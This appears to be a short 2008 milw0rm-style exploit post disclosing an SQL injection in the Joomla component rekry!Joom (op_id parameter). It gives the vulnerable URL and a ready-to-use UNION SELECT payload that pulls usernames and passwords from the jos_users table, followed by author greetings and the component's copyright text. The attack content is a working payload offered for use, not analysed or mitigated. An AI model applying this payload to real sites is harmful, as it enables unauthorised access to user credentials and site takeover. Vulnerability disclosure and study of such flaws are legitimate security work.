@ Joomla component rekry!Joom (op_id) <=1.0.0 SQL injectIon. Author:Sniper456 Contact:Sniper456[attt]gmail.com Greetss: My chilean people Developer:Matti Kiviharju **Bug: http://www.target.com/index.php?option=com_rekry&Itemid=xX&rekryview=view&op_id=[SQL] **Example http://www.target.com/index.php?option=com_rekry&Itemid=60&rekryview=view&op_id=-1/**/union/**/select/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20jos_users+limit+1,1-- # Fro000M CHILE my frieeeenD! 2008 # /* Grande colo colo */ side note: rekry 18.07.2006 Matti Kiviharju Copyright 2006 by Matti Kiviharju. All rights reserved! info@teknologiaplaneetta.com www.teknologiaplaneetta.com 1.0.0 This component allows careers to send their career info to databese! # milw0rm.com [2008-03-23]